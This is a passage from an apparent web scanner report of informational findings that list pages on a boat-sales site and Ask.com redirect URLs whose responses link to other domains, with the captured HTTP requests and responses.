http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:59 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.53. http://www.yachtworld.com/core/sponsored-boats/search.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/sponsored-boats/search.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/sponsored-boats/search.htm?page=1&currencyid=100&luom=126

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/sponsored-boats/search.htm?page=1&currencyid=100&luom=126 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:50 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.54. http://www.yachtworld.com/leaving_yw.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/leaving_yw.cgi?url=http://www.starlingmarine.com

The response contains the following link to another domain:

http://www.starlingmarine.com/

Request

GET /leaving_yw.cgi?url=http://www.starlingmarine.com HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=" NAME="back" noscroll>
<FRAME SRC="http://www.starlingmarine.com" NAME="cust_url">
</FRAMESET>

...[SNIP]...
mporarily leaving YachtWorld. Please make a note of our URL, or bookmark our homepage to return easily. You can also use the "back" button on your browser to return, when you are finished browsing the <A HREF="http://www.starlingmarine.com"><strong>
...[SNIP]...
<CENTER>Please <A HREF="http://www.starlingmarine.com">visit the <strong>
...[SNIP]...

12.55. http://wzus1.ask.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/r

Issue detail

The page was loaded from a URL containing a query string:

http://wzus1.ask.com/r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c404f&ip=adc1d6f3&id=98661B091CD7946B37C24EBBC344D14A&q=regulator+boat&p=1&qs=0&ac=1082&g=6a98AMnBCxZqxV&en=te&io=0&ep=&eo=&b=a001&bc=&br=&tp=d&ec=1&pt=Regulator%20Marine%3A%3A%20THE%20FINEST%20IN%20OFFSHORE%20SPORTFISHING%20BOATS&ex=tsrc%3Dtled&url=&u=http://www.regulatormarine.com/

The response contains the following link to another domain:

http://www.regulatormarine.com/

Request

GET /r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c404f&ip=adc1d6f3&id=98661B091CD7946B37C24EBBC344D14A&q=regulator+boat&p=1&qs=0&ac=1082&g=6a98AMnBCxZqxV&en=te&io=0&ep=&eo=&b=a001&bc=&br=&tp=d&ec=1&pt=Regulator%20Marine%3A%3A%20THE%20FINEST%20IN%20OFFSHORE%20SPORTFISHING%20BOATS&ex=tsrc%3Dtled&url=&u=http://www.regulatormarine.com/ HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; qh=1-cmVndWxhdG9yK2JvYXQ.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.2.10.1296155592; wz_sid=014DDB4118C033B329ACD8C41BD460F3; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE1LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:19 GMT
Location: http://www.regulatormarine.com/
Content-Length: 215
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.regulatormarine.com/">here</a>.</p>

...[SNIP]...

12.56. http://wzus1.ask.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/r

Issue detail

The page was loaded from a URL containing a query string:

http://wzus1.ask.com/r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c4072&ip=adc1d6f3&id=288C5F73AF09BD83114CE98E849718FF&q=regulator+boat+north+carolina&p=1&qs=2990&ac=823&g=7895S7caNNOlJY&en=te&io=0&ep=&eo=&b=a003&bc=&br=&tp=d&ec=1&pt=Starling%20Marine%20-%20Wilmington%20North%20Carolina%20-%20Boat%20Dealer%20and%20Yacht&ex=tsrc%3Dlxlx&url=&u=http://www.starlingmarine.com/

The response contains the following link to another domain:

http://www.starlingmarine.com/

Request

GET /r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c4072&ip=adc1d6f3&id=288C5F73AF09BD83114CE98E849718FF&q=regulator+boat+north+carolina&p=1&qs=2990&ac=823&g=7895S7caNNOlJY&en=te&io=0&ep=&eo=&b=a003&bc=&br=&tp=d&ec=1&pt=Starling%20Marine%20-%20Wilmington%20North%20Carolina%20-%20Boat%20Dealer%20and%20Yacht&ex=tsrc%3Dlxlx&url=&u=http://www.starlingmarine.com/ HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; ldpt=porg=5488|0~5489|0~5490|1; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:15:47 GMT
Location: http://www.starlingmarine.com/
Content-Length: 214
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.starlingmarine.com/">here</a>.</p>
<
...[SNIP]...

12.57. http://wzus1.ask.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/r

Issue detail

The page was loaded from a URL containing a query string:

http://wzus1.ask.com/r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c4072&ip=adc1d6f3&id=288C5F73AF09BD83114CE98E849718FF&q=regulator+boat+north+carolina&p=1&qs=2990&ac=823&g=7895S7caNNOlJY&en=in&io=0&ep=&eo=&b=a002&bc=&br=&tp=d&ec=1&pt=Regulator%20Marine%20%3A%3A%20Products%20%3A%3A%20Quality&ex=tsrc%3Dtled&url=&u=http://www.regulatormarine.com/quality.html

The response contains the following link to another domain:

http://www.regulatormarine.com/quality.html

Request

GET /r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c4072&ip=adc1d6f3&id=288C5F73AF09BD83114CE98E849718FF&q=regulator+boat+north+carolina&p=1&qs=2990&ac=823&g=7895S7caNNOlJY&en=in&io=0&ep=&eo=&b=a002&bc=&br=&tp=d&ec=1&pt=Regulator%20Marine%20%3A%3A%20Products%20%3A%3A%20Quality&ex=tsrc%3Dtled&url=&u=http://www.regulatormarine.com/quality.html HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; ldpt=porg=5488|0~5489|0~5490|1; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:15:47 GMT
Location: http://www.regulatormarine.com/quality.html
Content-Length: 227
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.regulatormarine.com/quality.html">here</a>
...[SNIP]...

12.58. http://wzus1.ask.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/r

Issue detail

The page was loaded from a URL containing a query string:

